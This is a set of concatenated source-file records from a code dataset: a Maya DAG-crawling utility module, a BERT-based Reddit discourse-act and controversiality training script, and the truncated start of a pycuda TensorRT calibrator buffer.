self.path_dict:\n path = self._api_node_to_path(api_node, use_cache=True)\n try:\n self.tree.pop_at_path(path)\n except KeyError:\n path = self._api_node_to_path(api_node, use_cache=False)\n self.tree.pop_at_path(path)\n for node in [api_node] + api_node.descendants:\n self._clear_saved_path(node)\n else:\n cb_logger.debug('{} has already been removed', api_node)\n\n def api_node_path(self, split_path):\n \"\"\"given a list of names representing a hierarchy, return the\n api_node representations of those names\"\"\"\n 
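Taken together, `populate`, `name_to_node`, `branch_at_node` and the add/remove methods give a queryable snapshot of the scene. A usage sketch, assuming a running Maya session; the `|group1|pCube1` path is a hypothetical scene node, not something this module guarantees exists:

crawler = DagCrawler()
crawler.populate()                             # snapshot every DAG node
cube = crawler.name_to_node('|group1|pCube1')  # hypothetical full path
subtree = crawler.branch_at_node(cube)         # TreeNode for its hierarchy
crawler.remove_node(cube)                      # drop it and its cached paths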
lookups = self._left_fold(split_path)\n nodes = []\n for lookup in lookups:\n branch = self._branch_at_split(lookup)\n nodes.append(branch[self.key_type])\n return nodes\n\n # ------------------------------------------------------ Helpers -- #\n @staticmethod\n def _left_fold(split_path):\n \"\"\"fold the given path left:\n >> _left_fold([a, b, c])\n >> [a], [a, b], [a, b, c]\n \"\"\"\n return [split_path[0:i + 1] for i in range(len(split_path))]\n\n def _recurse_key_to_key(self, top_dict, sub_dict):\n for key, mixed_dict in sub_dict.items():\n node = mixed_dict.pop(self.key_type)\n top_dict[node] = {}\n self._recurse_key_to_key(top_dict[node], mixed_dict)\n return top_dict\n\n def key_dict(self):\n \"\"\"flatten a nested dictionary by key values\"\"\"\n new_dict = {}\n return self._recurse_key_to_key(new_dict, self.tree)\n\n\nclass LiveDagCrawler(DagCrawler):\n \"\"\"The \"live\" version of the DagCrawler registers its own set of callbacks\n to keep itself up to date when the DAG model changes in Maya. This class\n is meant to be pretty hands-off, so the only \"public\" function is \"freeze\",\n which kills all the callbacks\"\"\"\n\n def __init__(self, scene_watcher=None, *args, **kwargs):\n super(LiveDagCrawler, self).__init__(*args, **kwargs)\n self.populate()\n self._watcher = scene_watcher if scene_watcher else SceneWatcher()\n self.update_callbacks = []\n self._add_hooks()\n\n def _updated(self):\n for callback in self.update_callbacks:\n callback()\n\n def _add_hooks(self):\n logger.debug('initializing callbacks for LiveDagCrawler')\n self._watcher.hook('any_node_added',\n node_type='dagNode').append(self._node_added)\n self._watcher.hook('any_node_removed',\n node_type='dagNode').append(self._node_removed)\n self._watcher.hook('any_child_added').append(self._child_added)\n self._watcher.hook('any_name_changed').append(self._node_renamed)\n\n def _node_added(self, api_node, _):\n cb_logger.debug(\"callback triggered - node added: {}\", api_node)\n cb_logger.debug(\"adding node to tree...\")\n self.add_node(api_node)\n\n def _node_removed(self, api_node, _):\n cb_logger.debug(\"callback triggered - node removed: {}\", api_node)\n cb_logger.debug(\"removing node from tree...\")\n self.remove_node(api_node)\n\n def _child_added(self, child, *_):\n if child.is_valid:\n cb_logger.debug(\"callback triggered - child added: {}\", child)\n cb_logger.debug(\"re-pathing node tree...\")\n old_path = self._api_node_to_path(child, use_cache=True)\n new_path = self._api_node_to_path(child, use_cache=False)\n self.repath(child, old_path, new_path, repath_descendants=True)\n\n def _node_renamed(self, api_node, old_name, _):\n if api_node in self.path_dict:\n cb_logger.debug(\"callback triggered - node renamed: {}\", api_node)\n cb_logger.debug(\"re-pathing node tree...\")\n new_path = self._api_node_to_path(api_node)\n old_path = new_path[:-1] + [old_name]\n self.repath(api_node, old_path, new_path, repath_descendants=True)\n\n def freeze(self):\n self._watcher.flush()\n\n def __del__(self):\n try:\n self._watcher.flush()\n except:\n raise\n\n# -------------------------------------------------------------------------- #\n# -------------------------------------------------------------------- LS -- #\nclass dg_iter(object):\n \"\"\"class for iterating over nodes, either in the Dependency Graph or\n the DAG. Performance is close to cmds.ls, and exceeds it in certain\n custom plugin-type lookups. 
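`_left_fold` is the piece that lets `api_node_path` resolve every ancestor of a name path in a single pass; its output is simply every prefix of the input list:

prefixes = DagCrawler._left_fold(['group1', 'pCube1', 'pCubeShape1'])
# -> [['group1'], ['group1', 'pCube1'], ['group1', 'pCube1', 'pCubeShape1']]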
\"\"\"\n\n # defines the kinds of iteration possible with the class\n iterators = {'depend': (om.MItDependencyNodes, 'thisNode'),\n 'dag': (om.MItDag, 'currentItem')}\n\n def __init__(self, iterator_type='depend',\n plugin_types=[om.MFn.kPluginDependNode],\n maya_types=None):\n # if no maya type filters are provided, just get all dependency nodes\n maya_types = maya_types or ['dependencyNode']\n self.it, self._get_method = dg_iter.iterators[iterator_type]\n self.plugin_search = plugin_types[0]\n self.filter, self.plugin_types = self._build_filter(maya_types)\n\n def walk(self, it):\n \"\"\"do the work of moving through maya's provided iterator classes\"\"\"\n\n # determine interface beforehand. in large scenes, removing\n # the dot increases execution speed by up to 20%\n done = it.isDone\n\n # MItDag and MItDependNodes have two different methods for getting the\n # current node, thisNode and currentItem. We use getattr to grab the\n # correct method\n current_item = getattr(it, self._get_method)\n advance_item = it.next\n # get all objects in the main loop\n while not done():\n n = current_item()\n yield n\n advance_item()\n raise StopIteration\n\n def iterate(self):\n \"\"\"generator for dependency nodes\"\"\"\n # determine iterator type\n main_it = self.it(self.filter)\n # walk through two iterators, one set to the maya type filters,\n # and another for types associated with plugins\n for n in self.walk(main_it):\n yield n\n filters = self.plugin_types\n if filters:\n plugin_it = self.it(self._to_filter(self.plugin_search))\n for n in self.walk(plugin_it):\n if api.type_of(n) in filters:\n yield n\n\n def to_api_nodes(self):\n for obj in self.iterate():\n yield api.ApiNode(obj)\n raise StopIteration\n\n def to_msel(self):\n return api.msel_from_iter(self.iterate())\n\n def to_strings(self):\n return api.msel_to_strings(self.to_msel())\n\n def _build_filter(self, filters):\n it_filter = om.MIteratorType()\n types = om.MIntArray()\n _filters = list(filters)\n for filter_ in list(_filters):\n\n enumerated = api.fn_type_string_to_int(filter_)\n if enumerated:\n types.append(enumerated)\n _filters.remove(filter_)\n else:\n pass\n it_filter.setFilterList(types)\n return (it_filter, _filters)\n\n def _to_filter(self, enumerated):\n it_filter = om.MIteratorType()\n types = om.MIntArray()\n types.append(enumerated)\n it_filter.setFilterList(types)\n return it_filter\n\n def __iter__(self):\n return self.iterate()\n\n# selection helpers\n# TODO: this is weird, and needs to be moved\n\ndef selection():\n sel_list = om.MSelectionList()\n om.MGlobal.getActiveSelectionList(sel_list)\n return sel_list\n\ndef selection_iter():\n return iterate_msel_list(selection())\n\n# mselectionlist helpers\n# TODO: move this somewhere better\n\ndef iterate_msel_list(sel_list):\n iterator = om.MItSelectionList(sel_list)\n while not iterator.isDone():\n obj = om.MObject()\n iterator.getDependNode(obj)\n yield obj\n iterator.next()\n", "sub_path": "mirage/dg_utils.py", "file_name": "dg_utils.py", "file_ext": "py", "file_size_in_byte": 13807, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "vfx_utils.omni.data_types.TreeNode", "line_number": 30, "usage_type": "call"}, {"api_name": "vfx_utils.omni.slog.Logger", "line_number": 32, "usage_type": "call"}, {"api_name": "vfx_utils.omni.slog", "line_number": 32, "usage_type": "name"}, {"api_name": "vfx_utils.omni.slog.Logger", "line_number": 35, "usage_type": "call"}, {"api_name": 
"vfx_utils.omni.slog", "line_number": 35, "usage_type": "name"}, {"api_name": "maya.OpenMaya.MItDag", "line_number": 42, "usage_type": "call"}, {"api_name": "maya.OpenMaya", "line_number": 42, "usage_type": "name"}, {"api_name": "vfx_utils.omni.data_types.TreeDict", "line_number": 59, "usage_type": "call"}, {"api_name": "vfx_utils.omni.data_types.TreeDict", "line_number": 66, "usage_type": "call"}, {"api_name": "itertools.chain", "line_number": 71, "usage_type": "call"}, {"api_name": "vfx_utils.mirage.api_utils.msplit", "line_number": 119, "usage_type": "call"}, {"api_name": "vfx_utils.mirage.api_utils.msplit", "line_number": 140, "usage_type": "call"}, {"api_name": "vfx_utils.mirage.api_utils.msplit", "line_number": 142, "usage_type": "call"}, {"api_name": "vfx_utils.mirage.maya_callbacks.watchers.SceneWatcher", "line_number": 207, "usage_type": "call"}, {"api_name": "maya.OpenMaya.MItDependencyNodes", "line_number": 267, "usage_type": "attribute"}, {"api_name": "maya.OpenMaya", "line_number": 267, "usage_type": "name"}, {"api_name": "maya.OpenMaya.MItDag", "line_number": 268, "usage_type": "attribute"}, {"api_name": "maya.OpenMaya", "line_number": 268, "usage_type": "name"}, {"api_name": "maya.OpenMaya.MFn", "line_number": 271, "usage_type": "attribute"}, {"api_name": "maya.OpenMaya", "line_number": 271, "usage_type": "name"}, {"api_name": "vfx_utils.mirage.api_utils.type_of", "line_number": 310, "usage_type": "call"}, {"api_name": "vfx_utils.mirage.api_utils", "line_number": 310, "usage_type": "name"}, {"api_name": "vfx_utils.mirage.api_utils.ApiNode", "line_number": 315, "usage_type": "call"}, {"api_name": "vfx_utils.mirage.api_utils", "line_number": 315, "usage_type": "name"}, {"api_name": "vfx_utils.mirage.api_utils.msel_from_iter", "line_number": 319, "usage_type": "call"}, {"api_name": "vfx_utils.mirage.api_utils", "line_number": 319, "usage_type": "name"}, {"api_name": "vfx_utils.mirage.api_utils.msel_to_strings", "line_number": 322, "usage_type": "call"}, {"api_name": "vfx_utils.mirage.api_utils", "line_number": 322, "usage_type": "name"}, {"api_name": "maya.OpenMaya.MIteratorType", "line_number": 325, "usage_type": "call"}, {"api_name": "maya.OpenMaya", "line_number": 325, "usage_type": "name"}, {"api_name": "maya.OpenMaya.MIntArray", "line_number": 326, "usage_type": "call"}, {"api_name": "maya.OpenMaya", "line_number": 326, "usage_type": "name"}, {"api_name": "vfx_utils.mirage.api_utils.fn_type_string_to_int", "line_number": 330, "usage_type": "call"}, {"api_name": "vfx_utils.mirage.api_utils", "line_number": 330, "usage_type": "name"}, {"api_name": "maya.OpenMaya.MIteratorType", "line_number": 340, "usage_type": "call"}, {"api_name": "maya.OpenMaya", "line_number": 340, "usage_type": "name"}, {"api_name": "maya.OpenMaya.MIntArray", "line_number": 341, "usage_type": "call"}, {"api_name": "maya.OpenMaya", "line_number": 341, "usage_type": "name"}, {"api_name": "maya.OpenMaya.MSelectionList", "line_number": 353, "usage_type": "call"}, {"api_name": "maya.OpenMaya", "line_number": 353, "usage_type": "name"}, {"api_name": "maya.OpenMaya.MGlobal.getActiveSelectionList", "line_number": 354, "usage_type": "call"}, {"api_name": "maya.OpenMaya.MGlobal", "line_number": 354, "usage_type": "attribute"}, {"api_name": "maya.OpenMaya", "line_number": 354, "usage_type": "name"}, {"api_name": "maya.OpenMaya.MItSelectionList", "line_number": 364, "usage_type": "call"}, {"api_name": "maya.OpenMaya", "line_number": 364, "usage_type": "name"}, {"api_name": "maya.OpenMaya.MObject", "line_number": 
366, "usage_type": "call"}, {"api_name": "maya.OpenMaya", "line_number": 366, "usage_type": "name"}]} +{"seq_id": "129672453", "text": "import tqdm\nimport numpy as np\nimport pandas as pd\n\nfrom nltk.tokenize import word_tokenize\nfrom nltk.stem import WordNetLemmatizer \nfrom transformers import BertTokenizer\nfrom scipy.special import softmax\nimport torch\nimport pickle\n\nfrom torch.utils.data import TensorDataset, DataLoader\nfrom transformers import BertForSequenceClassification, AdamW, BertConfig\nfrom transformers import get_linear_schedule_with_warmup\n\nfrom sklearn.model_selection import train_test_split\n\n\nwith open('models/discourse_model.pickle', 'rb') as f:\n model = pickle.load(f)\n\nmodel.eval()\n\nimport pickle\n\nimport torch\n\n# If there's a GPU available...\nif torch.cuda.is_available(): \n # Tell PyTorch to use the GPU. \n device = torch.device(\"cuda\")\n print('There are %d GPU(s) available.' % torch.cuda.device_count())\n print('We will use the GPU:', torch.cuda.get_device_name(0))\n\n# If not...\nelse:\n print('No GPU available, using the CPU instead.')\n device = torch.device(\"cpu\")\n\n\ntqdm.tqdm.pandas()\n\nlemmatizer = WordNetLemmatizer() \n\ndef flatten_thread_r(thread_id, comments):\n extracted_comments = []\n if len(comments) == 0:\n return extracted_comments\n else:\n \n for comment in comments:\n comment_dict = {\n 'id': comment['id'],\n 'parent_id': comment['parent_id'] or thread_id,\n 'controversiality': comment['controversiality'],\n 'body': comment['body'],\n 'created_utc': comment['created_utc'],\n 'author': comment['author']\n }\n \n extracted_comments += [comment_dict] + flatten_thread_r(thread_id, comment['children'])\n \n return extracted_comments\n\ndef flatten_thread(thread):\n flattened_comments = flatten_thread_r(thread['id'], thread['children'])\n return flattened_comments\n\ndef label(threads):\n def percent_upvoted(x):\n if x.ups + x.downs == 0:\n return 0\n return x.ups / (x.ups + x.downs)\n\n\n threads['percent_upvoted'] = threads.apply(percent_upvoted, axis=1)\n bottom_quartile = np.percentile(threads.percent_upvoted.values, 25)\n top_quartile = np.percentile(threads.percent_upvoted.values, 75)\n\n print('Bottom quartile: ', bottom_quartile)\n print('Top quartile: ', top_quartile)\n\n def controversiality(x):\n if x <= bottom_quartile:\n return int(True)\n elif x >= top_quartile:\n return int(False)\n else:\n return -1\n\n threads['label'] = threads.percent_upvoted.apply(controversiality)\n threads = threads[threads.label != -1]\n\n return threads\n\n\ndef prep_data(threads):\n threads = label(threads)\n threads['comments'] = threads.progress_apply(flatten_thread, axis=1)\n\n return threads\n\ndef get_corpus(threads):\n corpus = []\n \n def _get_corpus(thread):\n corpus.append(' '.join([lemmatizer.lemmatize(word.lower()) for word in word_tokenize(thread.selftext)]))\n for comment in thread.comments:\n corpus.append(' '.join([lemmatizer.lemmatize(word.lower()) for word in word_tokenize(comment['body'])]))\n \n threads.progress_apply(_get_corpus, axis=1)\n \n return corpus\n\ndef get_ids(threads):\n ids = {}\n def _get_ids(thread):\n ids[thread.id] = [comment['id'] for comment in thread.comments]\n\n threads.progress_apply(_get_ids, axis=1)\n\n return ids\n\ndef _text_to_bert(threads):\n def tokenize_fn(x):\n tokenized = ['[CLS]'] + bert_tokenizer.tokenize(x)[:510] + ['[SEP]']\n \n if len(tokenized) < 512:\n tokenized += ['[PAD]'] * (512 - len(tokenized))\n tokenized = bert_tokenizer.convert_tokens_to_ids(tokenized)\n return 
tokenized\n \n def tokenize_comments(x):\n return [tokenize_fn(comment['body']) for comment in x]\n \n \n title_body = threads.title + ' ' + threads.selftext\n title_body = title_body.apply(tokenize_fn)\n comments = threads.comments.progress_apply(tokenize_comments)\n \n return (title_body, comments)\n\ndef _create_tb_mask(x):\n return [token_id > 0 for token_id in x]\n\ndef _create_comment_mask(x):\n c = []\n for comment in x:\n c.append([token_id > 0 for token_id in comment])\n return torch.LongTensor(np.stack(c)) if len(c) > 0 else torch.LongTensor([[0] * 512])\n\n\n# NOTE: this early draft of get_discourse_acts builds the tensors but never\n# returns them; the get_discourse_acts defined further down supersedes it.\ndef get_discourse_acts(threads):\n tokenizer = BertTokenizer.from_pretrained('bert-base-uncased')\n with open('discourse_model.pickle', 'rb') as f:\n discourse_model = pickle.load(f)\n\n title_body, comments = _text_to_bert(threads)\n title_body_mask = title_body.apply(_create_tb_mask)\n comment_mask = comments.apply(_create_comment_mask)\n\n title_body_tensor = torch.LongTensor(np.stack(title_body.values))\n title_body_mask = torch.LongTensor(np.stack(title_body_mask.values))\n\n comment_tensor = comments.progress_apply(lambda x: torch.LongTensor(np.stack(x)) if len(x) > 0 else torch.LongTensor(np.stack([[0] * 512])))\n comment_mask = torch.LongTensor(np.stack(comment_mask.values))\n\ndef _find_post(id, comments):\n for comment in comments:\n if comment['id'] == id:\n return comment\n return None\n\ndef _create_bigrams(thread):\n bigrams = []\n for comment in thread.comments:\n parent = _find_post(comment['parent_id'], thread.comments)\n if parent is None:\n bigrams.append((thread.discourse_act, comment['discourse_act']))\n else:\n bigrams.append((parent['discourse_act'], comment['discourse_act']))\n \n return bigrams\n\ndef create_bigrams(threads):\n threads['bigrams'] = threads.apply(_create_bigrams, axis=1)\n\ndef logits_to_act(logits):\n return np.argmax(softmax(logits, axis=-1), axis=-1)\n\n\ndef assign_acts(tb_acts, c_acts, threads):\n acts = logits_to_act(np.stack(tb_acts))\n threads['discourse_act'] = acts\n i = 0\n for idx, row in tqdm.tqdm(threads.iterrows(), total=len(threads)):\n cs = logits_to_act(c_acts[i])\n new_comments = []\n for c, c_act in zip(row.comments, cs):\n c['discourse_act'] = c_act\n new_comments.append(c)\n i += 1\n assert all(['discourse_act' in c.keys() for c in new_comments]), 'Not every comment got an act!' 
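`tokenize_fn` above implements the standard fixed-length BERT recipe: `[CLS]`, at most 510 wordpieces, `[SEP]`, then `[PAD]` out to the 512-token window, with `_create_tb_mask` marking real tokens as 1 and padding as 0. A standalone illustration of that recipe, assuming only that the `transformers` package is installed:

from transformers import BertTokenizer

tok = BertTokenizer.from_pretrained('bert-base-uncased')
tokens = ['[CLS]'] + tok.tokenize('an example reddit post')[:510] + ['[SEP]']
tokens += ['[PAD]'] * (512 - len(tokens))
ids = tok.convert_tokens_to_ids(tokens)   # '[PAD]' maps to id 0
mask = [int(i > 0) for i in ids]          # 1 = real token, 0 = padding
assert len(ids) == len(mask) == 512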
\n row.comments = new_comments\n\ndef text_to_discourse_acts(threads):\n print(\"Vectorizing threads...\")\n title_body_tensor, title_body_mask, comment_tensor, comment_mask = get_tensors(threads)\n print(\"Running BERT\")\n tb_acts, c_acts = get_discourse_acts(title_body_tensor, title_body_mask, comment_tensor, comment_mask)\n print(\"Assigning acts...\")\n assign_acts(tb_acts, c_acts, threads)\n print('Done.')\n\ndef get_discourse_acts(title_body_tensor, title_body_mask, comment_tensor, comment_mask):\n tb_acts = []\n c_acts = []\n for tbt, tbm, ct, cm in tqdm.tqdm(zip(title_body_tensor, title_body_mask, comment_tensor, comment_mask), total=len(title_body_tensor)):\n with torch.no_grad():\n dataset = TensorDataset(ct, cm)\n loader = DataLoader(dataset, batch_size=3)\n \n tbt = tbt.to(device)\n tbm = tbm.to(device)\n \n tb_act = model(tbt.view((1, -1)), attention_mask = tbm.view((1, -1)))[0].cpu().numpy()\n tb_acts.append(tb_act[0])\n \n cs = []\n for batch in loader:\n ct, cm = batch\n ct = ct.to(device)\n cm = cm.to(device)\n \n c_act = model(ct, cm)[0].cpu().numpy()\n for c in c_act:\n cs.append(c)\n cs = np.stack(cs)\n c_acts.append(cs)\n \n return tb_acts, c_acts\n\nbert_tokenizer = BertTokenizer.from_pretrained('bert-base-uncased')\ndef _text_to_bert(threads):\n def tokenize_fn(x):\n tokenized = ['[CLS]'] + bert_tokenizer.tokenize(x)[:510] + ['[SEP]']\n \n if len(tokenized) < 512:\n tokenized += ['[PAD]'] * (512 - len(tokenized))\n tokenized = bert_tokenizer.convert_tokens_to_ids(tokenized)\n return tokenized\n \n def tokenize_comments(x):\n return [tokenize_fn(comment['body']) for comment in x]\n \n \n title_body = threads.title + ' ' + threads.selftext\n title_body = title_body.apply(tokenize_fn)\n comments = threads.comments.progress_apply(tokenize_comments)\n \n return (title_body, comments)\n\ndef _create_tb_mask(x):\n return [int(token_id > 0) for token_id in x]\n\ndef _create_comment_mask(x):\n c = []\n for comment in x:\n c.append([int(token_id > 0) for token_id in comment])\n return torch.LongTensor(np.stack(c)) if len(c) > 0 else torch.LongTensor([[0] * 512])\n\n\ndef get_tensors(threads):\n title_body, comments = _text_to_bert(threads)\n title_body_mask = title_body.apply(_create_tb_mask)\n comment_mask = comments.apply(_create_comment_mask)\n\n title_body_tensor = torch.LongTensor(np.stack(title_body.values))\n title_body_mask = torch.LongTensor(np.stack(title_body_mask.values))\n\n comment_tensor = comments.progress_apply(lambda x: torch.LongTensor(np.stack(x)) if len(x) > 0 else torch.LongTensor(np.stack([[0] * 512])))\n comment_tensor = comment_tensor.values\n comment_mask = comment_mask.values\n \n return title_body_tensor, title_body_mask, comment_tensor, comment_mask\n\ndef _flat_accuracy(preds, labels):\n pred_flat = np.argmax(preds, axis=1).flatten()\n labels_flat = labels.flatten()\n return np.sum(pred_flat == labels_flat) / len(labels_flat)\n\nimport time\nimport datetime\n\ndef _format_time(elapsed):\n '''\n Takes a time in seconds and returns a string hh:mm:ss\n '''\n # Round to the nearest second.\n elapsed_rounded = int(round((elapsed)))\n \n # Format as hh:mm:ss\n return str(datetime.timedelta(seconds=elapsed_rounded))\n\ndef finetune_bert(title_body_tensor, title_body_mask, threads):\n labels = torch.LongTensor(np.stack(threads.label.values))\n print(labels.size())\n train_tbt, test_tbt, train_tbm, test_tbm, train_labels, test_labels = train_test_split(\n title_body_tensor, title_body_mask, labels,\n test_size=0.2, random_state=42\n )\n \n training_stats 
= []\n \n train_dataset = TensorDataset(train_tbt, train_tbm, train_labels)\n test_dataset = TensorDataset(test_tbt, test_tbm, test_labels)\n train_dataloader = DataLoader(train_dataset, batch_size=2)\n test_dataloader = DataLoader(test_dataset, batch_size=2)\n \n epochs = 4\n total_steps = len(train_dataloader) * epochs\n \n model = BertForSequenceClassification.from_pretrained(\n 'bert-base-uncased',\n num_labels=2,\n output_attentions=False,\n output_hidden_states=True\n )\n \n model.to(device)  # honors the CPU fallback selected at import time\n optimizer = AdamW(model.parameters(),\n lr=2e-5,\n eps=1e-8)\n scheduler = get_linear_schedule_with_warmup(optimizer, \n num_warmup_steps = 0, # Default value in run_glue.py\n num_training_steps = total_steps)\n total_steps = len(train_dataloader) * epochs\n total_t0 = time.time()\n for epoch_i in range(0, epochs):\n print(\"\")\n print('======== Epoch {:} / {:} ========'.format(epoch_i + 1, epochs))\n print('Training...')\n model.train()\n \n t0 = time.time()\n total_train_loss = 0\n \n for step, batch in enumerate(train_dataloader):\n b_input_ids = batch[0].to(device)\n b_input_mask = batch[1].to(device)\n b_labels = batch[2].to(device)\n \n model.zero_grad()\n \n loss, logits, _ = model(b_input_ids,\n token_type_ids=None,\n attention_mask=b_input_mask,\n labels=b_labels)\n \n total_train_loss += loss.item()\n loss.backward()\n torch.nn.utils.clip_grad_norm_(model.parameters(), 1.0)\n optimizer.step()\n scheduler.step()\n \n avg_train_loss = total_train_loss / len(train_dataloader)\n training_time = _format_time(time.time() - t0)\n print(\"\")\n print(\" Average training loss: {0:.2f}\".format(avg_train_loss))\n print(\" Training epoch took: {:}\".format(training_time))\n \n print(\"\")\n print(\"Running Validation...\")\n t0 = time.time()\n \n model.eval()\n \n total_eval_accuracy = 0\n total_eval_loss = 0\n nb_eval_steps = 0\n \n for batch in test_dataloader:\n b_input_ids = batch[0].to(device)\n b_input_mask = batch[1].to(device)\n b_labels = batch[2].to(device)\n \n with torch.no_grad(): \n loss, logits, _ = model(b_input_ids,\n token_type_ids=None,\n attention_mask=b_input_mask,\n labels=b_labels)\n \n total_eval_loss += loss.item()\n logits = logits.detach().cpu().numpy()\n label_ids = b_labels.cpu().numpy()\n \n total_eval_accuracy += _flat_accuracy(logits, label_ids)\n \n avg_val_accuracy = total_eval_accuracy / len(test_dataloader)\n print(\" Accuracy: {0:.2f}\".format(avg_val_accuracy))\n \n avg_val_loss = total_eval_loss / len(test_dataloader)\n validation_time = _format_time(time.time() - t0)\n \n print(\" Validation Loss: {0:.2f}\".format(avg_val_loss))\n print(\" Validation took: {:}\".format(validation_time))\n\n # Record all statistics from this epoch.\n training_stats.append(\n {\n 'epoch': epoch_i + 1,\n 'Training Loss': avg_train_loss,\n 'Valid. Loss': avg_val_loss,\n 'Valid. 
Accur.': avg_val_accuracy,\n 'Training Time': training_time,\n 'Validation Time': validation_time\n }\n )\n\n print(\"\")\n print(\"Training complete!\")\n\n print(\"Total training took {:} (h:mm:ss)\".format(_format_time(time.time()-total_t0)))\n return model.cpu(), training_stats", "sub_path": "utils.py", "file_name": "utils.py", "file_ext": "py", "file_size_in_byte": 14206, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "pickle.load", "line_number": 20, "usage_type": "call"}, {"api_name": "torch.cuda.is_available", "line_number": 29, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 29, "usage_type": "attribute"}, {"api_name": "torch.device", "line_number": 31, "usage_type": "call"}, {"api_name": "torch.cuda.device_count", "line_number": 32, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 32, "usage_type": "attribute"}, {"api_name": "torch.cuda.get_device_name", "line_number": 33, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 33, "usage_type": "attribute"}, {"api_name": "torch.device", "line_number": 38, "usage_type": "call"}, {"api_name": "tqdm.tqdm.pandas", "line_number": 41, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 41, "usage_type": "attribute"}, {"api_name": "nltk.stem.WordNetLemmatizer", "line_number": 43, "usage_type": "call"}, {"api_name": "numpy.percentile", "line_number": 77, "usage_type": "call"}, {"api_name": "numpy.percentile", "line_number": 78, "usage_type": "call"}, {"api_name": "nltk.tokenize.word_tokenize", "line_number": 107, "usage_type": "call"}, {"api_name": "nltk.tokenize.word_tokenize", "line_number": 109, "usage_type": "call"}, {"api_name": "torch.LongTensor", "line_number": 150, "usage_type": "call"}, {"api_name": "numpy.stack", "line_number": 150, "usage_type": "call"}, {"api_name": "transformers.BertTokenizer.from_pretrained", "line_number": 154, "usage_type": "call"}, {"api_name": "transformers.BertTokenizer", "line_number": 154, "usage_type": "name"}, {"api_name": "pickle.load", "line_number": 156, "usage_type": "call"}, {"api_name": "torch.LongTensor", "line_number": 162, "usage_type": "call"}, {"api_name": "numpy.stack", "line_number": 162, "usage_type": "call"}, {"api_name": "torch.LongTensor", "line_number": 163, "usage_type": "call"}, {"api_name": "numpy.stack", "line_number": 163, "usage_type": "call"}, {"api_name": "torch.LongTensor", "line_number": 165, "usage_type": "call"}, {"api_name": "numpy.stack", "line_number": 165, "usage_type": "call"}, {"api_name": "torch.LongTensor", "line_number": 166, "usage_type": "call"}, {"api_name": "numpy.stack", "line_number": 166, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 189, "usage_type": "call"}, {"api_name": "scipy.special.softmax", "line_number": 189, "usage_type": "call"}, {"api_name": "numpy.stack", "line_number": 193, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 196, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 218, "usage_type": "call"}, {"api_name": "torch.no_grad", "line_number": 219, "usage_type": "call"}, {"api_name": "torch.utils.data.TensorDataset", "line_number": 220, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 221, "usage_type": "call"}, {"api_name": "numpy.stack", "line_number": 238, "usage_type": "call"}, {"api_name": "transformers.BertTokenizer.from_pretrained", "line_number": 243, "usage_type": "call"}, {"api_name": "transformers.BertTokenizer", 
"line_number": 243, "usage_type": "name"}, {"api_name": "torch.LongTensor", "line_number": 270, "usage_type": "call"}, {"api_name": "numpy.stack", "line_number": 270, "usage_type": "call"}, {"api_name": "torch.LongTensor", "line_number": 278, "usage_type": "call"}, {"api_name": "numpy.stack", "line_number": 278, "usage_type": "call"}, {"api_name": "torch.LongTensor", "line_number": 279, "usage_type": "call"}, {"api_name": "numpy.stack", "line_number": 279, "usage_type": "call"}, {"api_name": "torch.LongTensor", "line_number": 281, "usage_type": "call"}, {"api_name": "numpy.stack", "line_number": 281, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 288, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 290, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 303, "usage_type": "call"}, {"api_name": "torch.LongTensor", "line_number": 306, "usage_type": "call"}, {"api_name": "numpy.stack", "line_number": 306, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 308, "usage_type": "call"}, {"api_name": "torch.utils.data.TensorDataset", "line_number": 315, "usage_type": "call"}, {"api_name": "torch.utils.data.TensorDataset", "line_number": 316, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 317, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 318, "usage_type": "call"}, {"api_name": "transformers.BertForSequenceClassification.from_pretrained", "line_number": 323, "usage_type": "call"}, {"api_name": "transformers.BertForSequenceClassification", "line_number": 323, "usage_type": "name"}, {"api_name": "transformers.AdamW", "line_number": 331, "usage_type": "call"}, {"api_name": "transformers.get_linear_schedule_with_warmup", "line_number": 334, "usage_type": "call"}, {"api_name": "time.time", "line_number": 338, "usage_type": "call"}, {"api_name": "time.time", "line_number": 345, "usage_type": "call"}, {"api_name": "torch.nn.utils.clip_grad_norm_", "line_number": 362, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 362, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 367, "usage_type": "call"}, {"api_name": "time.time", "line_number": 374, "usage_type": "call"}, {"api_name": "torch.no_grad", "line_number": 387, "usage_type": "call"}, {"api_name": "time.time", "line_number": 403, "usage_type": "call"}, {"api_name": "time.time", "line_number": 423, "usage_type": "call"}]} +{"seq_id": "407784829", "text": "# -*- coding: utf-8 -*-\nimport numpy as np\n\nimport pycuda.autoinit # noqa\nimport pycuda.driver as cuda\n\n\nclass _CalibratorBuffer:\n\n def __init__(self, bindings, batch_size):\n self.bindings = bindings\n self.allocations = {}\n for binding in self.bindings.values():\n elem_size = binding.type.size\n elem_count = binding.dimensions.size\n self.allocations[binding.name] = \\\n cuda.mem_alloc(batch_size * elem_size * elem_count)\n\n def release(self):\n for mem in self.allocations.values():\n mem.free()\n self.allocations = {}\n\n def put(self, name, index, value):\n binding = self.bindings[name]\n if value.dtype != binding.type.nptype:\n raise TypeError()\n if value.shape != binding.dimensions.shape:\n raise ValueError()\n allocation = self.allocations[name]\n elem_size = binding.type.size\n elem_count = binding.dimensions.size\n dstptr = int(allocation) + index * elem_size * elem_count\n if value.flags[\"C_CONTIGUOUS\"]:\n cuda.memcpy_htod(dstptr, value)\n else:\n cuda.memcpy_htod(dstptr, 
